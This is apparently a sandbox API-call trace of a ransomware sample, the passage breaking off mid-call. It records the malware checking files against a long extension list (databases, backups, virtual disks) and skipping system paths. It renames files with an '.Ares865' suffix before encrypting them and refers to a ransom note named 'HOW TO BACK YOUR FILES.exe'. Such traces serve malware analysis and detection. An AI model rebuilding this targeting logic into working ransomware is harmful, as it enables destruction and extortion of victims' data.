[0058.186] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.187] lstrlenW (lpString="mrg") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.187] lstrlenW (lpString="mud") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.187] lstrlenW (lpString="mwb") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.187] lstrlenW (lpString="myd") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.187] lstrlenW (lpString="ndf") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.187] lstrlenW (lpString="nnt") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.187] lstrlenW (lpString="nrmlib") returned 6 [0058.187] lstrcmpiW (lpString1="pt.lnk", lpString2="nrmlib") returned 1 [0058.187] lstrlenW (lpString="ns2") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.187] lstrlenW (lpString="ns3") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.187] lstrlenW (lpString="ns4") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.187] lstrlenW (lpString="nsf") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.187] lstrlenW (lpString="nv") returned 2 [0058.187] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.187] lstrlenW (lpString="nv2") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.187] lstrlenW (lpString="nwdb") returned 4 [0058.187] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.187] lstrlenW (lpString="nyf") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.187] lstrlenW (lpString="odb") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.187] lstrlenW (lpString="odb") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.187] lstrlenW (lpString="oqy") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.187] lstrlenW (lpString="ora") returned 3 [0058.187] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.187] lstrlenW (lpString="orx") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.188] lstrlenW (lpString="owc") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.188] lstrlenW (lpString="p96") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.188] lstrlenW (lpString="p97") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.188] lstrlenW (lpString="pan") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.188] lstrlenW (lpString="pdb") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.188] lstrlenW (lpString="pdm") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.188] lstrlenW (lpString="pnz") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.188] lstrlenW (lpString="qry") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.188] lstrlenW (lpString="qvd") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.188] lstrlenW (lpString="rbf") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.188] lstrlenW (lpString="rctd") returned 4 [0058.188] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.188] lstrlenW (lpString="rod") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.188] lstrlenW (lpString="rodx") returned 4 [0058.188] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.188] lstrlenW (lpString="rpd") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.188] lstrlenW (lpString="rsd") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.188] lstrlenW (lpString="sas7bdat") returned 8 [0058.188] lstrcmpiW (lpString1="ompt.lnk", lpString2="sas7bdat") returned -1 [0058.188] lstrlenW (lpString="sbf") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.188] lstrlenW (lpString="scx") returned 3 [0058.188] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.188] lstrlenW (lpString="sdb") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.189] lstrlenW (lpString="sdc") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.189] lstrlenW (lpString="sdf") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.189] lstrlenW (lpString="sis") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.189] lstrlenW (lpString="spq") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.189] lstrlenW (lpString="te") returned 2 [0058.189] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.189] lstrlenW (lpString="teacher") returned 7 [0058.189] lstrcmpiW (lpString1="mpt.lnk", lpString2="teacher") returned -1 [0058.189] lstrlenW (lpString="tmd") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.189] lstrlenW (lpString="tps") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.189] lstrlenW (lpString="trc") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.189] lstrlenW (lpString="trc") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.189] lstrlenW (lpString="trm") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.189] lstrlenW (lpString="udb") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.189] lstrlenW (lpString="udl") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.189] lstrlenW (lpString="usr") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.189] lstrlenW (lpString="v12") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.189] lstrlenW (lpString="vis") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.189] lstrlenW (lpString="vpd") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.189] lstrlenW (lpString="vvv") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.189] lstrlenW (lpString="wdb") returned 3 [0058.189] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.190] lstrlenW (lpString="wmdb") returned 4 [0058.190] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.190] lstrlenW (lpString="wrk") returned 3 [0058.190] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.190] lstrlenW (lpString="xdb") returned 3 [0058.190] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.190] lstrlenW (lpString="xld") returned 3 [0058.190] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.190] lstrlenW (lpString="xmlff") returned 5 [0058.190] lstrcmpiW (lpString1="t.lnk", lpString2="xmlff") returned -1 [0058.190] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.Ares865") returned 80 [0058.190] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\command prompt.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\command prompt.lnk.ares865"), dwFlags=0x1) returned 1 [0058.190] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\command prompt.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.191] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1280) returned 1 [0058.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.191] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0058.191] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0058.192] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.192] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.192] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x154 [0058.193] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0058.194] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0058.195] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.195] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.195] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.196] CloseHandle (hObject=0x154) returned 1 [0058.196] CloseHandle (hObject=0x15c) returned 1 [0058.197] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.197] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0058.197] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.197] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec08153b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0058.197] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.197] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0058.197] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0058.197] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0058.197] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0058.197] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0058.197] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0058.197] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0058.197] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0058.197] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0058.198] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0058.198] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0058.198] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0058.198] lstrlenW (lpString="Desktop.ini") returned 11 [0058.198] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Command Prompt.lnk") returned 72 [0058.198] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0058.198] lstrlenW (lpString="Desktop.ini") returned 11 [0058.198] lstrlenW (lpString="Ares865") returned 7 [0058.198] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0058.198] lstrlenW (lpString=".dll") returned 4 [0058.198] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0058.198] lstrlenW (lpString=".lnk") returned 4 [0058.198] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0058.198] lstrlenW (lpString=".ini") returned 4 [0058.198] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0058.198] lstrlenW (lpString=".sys") returned 4 [0058.198] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0058.198] lstrlenW (lpString="Desktop.ini") returned 11 [0058.198] lstrlenW (lpString="bak") returned 3 [0058.198] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0058.198] lstrlenW (lpString="ba_") returned 3 [0058.198] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0058.198] lstrlenW (lpString="dbb") returned 3 [0058.198] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0058.198] lstrlenW (lpString="vmdk") returned 4 [0058.198] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0058.198] lstrlenW (lpString="rar") returned 3 [0058.198] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0058.198] lstrlenW (lpString="zip") returned 3 [0058.198] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0058.198] lstrlenW (lpString="tgz") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0058.199] lstrlenW (lpString="vbox") returned 4 [0058.199] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0058.199] lstrlenW (lpString="vdi") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0058.199] lstrlenW (lpString="vhd") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0058.199] lstrlenW (lpString="vhdx") returned 4 [0058.199] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0058.199] lstrlenW (lpString="avhd") returned 4 [0058.199] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0058.199] lstrlenW (lpString="db") returned 2 [0058.199] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0058.199] lstrlenW (lpString="db2") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0058.199] lstrlenW (lpString="db3") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0058.199] lstrlenW (lpString="dbf") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0058.199] lstrlenW (lpString="mdf") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0058.199] lstrlenW (lpString="mdb") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0058.199] lstrlenW (lpString="sql") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0058.199] lstrlenW (lpString="sqlite") returned 6 [0058.199] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0058.199] lstrlenW (lpString="sqlite3") returned 7 [0058.199] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0058.199] lstrlenW (lpString="sqlitedb") returned 8 [0058.199] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0058.199] lstrlenW (lpString="xml") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0058.199] lstrlenW (lpString="$er") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0058.199] lstrlenW (lpString="4dd") returned 3 [0058.199] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0058.200] lstrlenW (lpString="4dl") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0058.200] lstrlenW (lpString="^^^") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0058.200] lstrlenW (lpString="abs") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0058.200] lstrlenW (lpString="abx") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0058.200] lstrlenW (lpString="accdb") returned 5 [0058.200] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0058.200] lstrlenW (lpString="accdc") returned 5 [0058.200] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0058.200] lstrlenW (lpString="accde") returned 5 [0058.200] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0058.200] lstrlenW (lpString="accdr") returned 5 [0058.200] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0058.200] lstrlenW (lpString="accdt") returned 5 [0058.200] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0058.200] lstrlenW (lpString="accdw") returned 5 [0058.200] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0058.200] lstrlenW (lpString="accft") returned 5 [0058.200] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0058.200] lstrlenW (lpString="adb") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.200] lstrlenW (lpString="adb") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.200] lstrlenW (lpString="ade") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0058.200] lstrlenW (lpString="adf") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0058.200] lstrlenW (lpString="adn") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0058.200] lstrlenW (lpString="adp") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0058.200] lstrlenW (lpString="alf") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0058.200] lstrlenW (lpString="ask") returned 3 [0058.200] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0058.201] lstrlenW (lpString="btr") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0058.201] lstrlenW (lpString="cat") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0058.201] lstrlenW (lpString="cdb") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0058.201] lstrlenW (lpString="ckp") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0058.201] lstrlenW (lpString="cma") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0058.201] lstrlenW (lpString="cpd") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0058.201] lstrlenW (lpString="dacpac") returned 6 [0058.201] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0058.201] lstrlenW (lpString="dad") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0058.201] lstrlenW (lpString="dadiagrams") returned 10 [0058.201] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0058.201] lstrlenW (lpString="daschema") returned 8 [0058.201] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0058.201] lstrlenW (lpString="db-journal") returned 10 [0058.201] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0058.201] lstrlenW (lpString="db-shm") returned 6 [0058.201] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0058.201] lstrlenW (lpString="db-wal") returned 6 [0058.201] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0058.201] lstrlenW (lpString="dbc") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0058.201] lstrlenW (lpString="dbs") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0058.201] lstrlenW (lpString="dbt") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0058.201] lstrlenW (lpString="dbv") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0058.201] lstrlenW (lpString="dbx") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0058.201] lstrlenW (lpString="dcb") returned 3 [0058.201] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0058.202] lstrlenW (lpString="dct") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0058.202] lstrlenW (lpString="dcx") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0058.202] lstrlenW (lpString="ddl") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0058.202] lstrlenW (lpString="dlis") returned 4 [0058.202] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0058.202] lstrlenW (lpString="dp1") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0058.202] lstrlenW (lpString="dqy") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0058.202] lstrlenW (lpString="dsk") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0058.202] lstrlenW (lpString="dsn") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0058.202] lstrlenW (lpString="dtsx") returned 4 [0058.202] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0058.202] lstrlenW (lpString="dxl") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0058.202] lstrlenW (lpString="eco") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0058.202] lstrlenW (lpString="ecx") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0058.202] lstrlenW (lpString="edb") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0058.202] lstrlenW (lpString="epim") returned 4 [0058.202] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0058.202] lstrlenW (lpString="fcd") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0058.202] lstrlenW (lpString="fdb") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0058.202] lstrlenW (lpString="fic") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0058.202] lstrlenW (lpString="flexolibrary") returned 12 [0058.202] lstrlenW (lpString="fm5") returned 3 [0058.202] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0058.203] lstrlenW (lpString="fmp") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0058.203] lstrlenW (lpString="fmp12") returned 5 [0058.203] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0058.203] lstrlenW (lpString="fmpsl") returned 5 [0058.203] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0058.203] lstrlenW (lpString="fol") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0058.203] lstrlenW (lpString="fp3") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0058.203] lstrlenW (lpString="fp4") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0058.203] lstrlenW (lpString="fp5") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0058.203] lstrlenW (lpString="fp7") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0058.203] lstrlenW (lpString="fpt") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0058.203] lstrlenW (lpString="frm") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0058.203] lstrlenW (lpString="gdb") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.203] lstrlenW (lpString="gdb") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.203] lstrlenW (lpString="grdb") returned 4 [0058.203] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0058.203] lstrlenW (lpString="gwi") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0058.203] lstrlenW (lpString="hdb") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0058.203] lstrlenW (lpString="his") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0058.203] lstrlenW (lpString="ib") returned 2 [0058.203] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0058.203] lstrlenW (lpString="idb") returned 3 [0058.203] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0058.203] lstrlenW (lpString="ihx") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0058.204] lstrlenW (lpString="itdb") returned 4 [0058.204] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0058.204] lstrlenW (lpString="itw") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0058.204] lstrlenW (lpString="jet") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0058.204] lstrlenW (lpString="jtx") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0058.204] lstrlenW (lpString="kdb") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0058.204] lstrlenW (lpString="kexi") returned 4 [0058.204] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0058.204] lstrlenW (lpString="kexic") returned 5 [0058.204] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0058.204] lstrlenW (lpString="kexis") returned 5 [0058.204] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0058.204] lstrlenW (lpString="lgc") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0058.204] lstrlenW (lpString="lwx") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0058.204] lstrlenW (lpString="maf") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0058.204] lstrlenW (lpString="maq") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0058.204] lstrlenW (lpString="mar") returned 3 [0058.204] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0058.204] lstrlenW 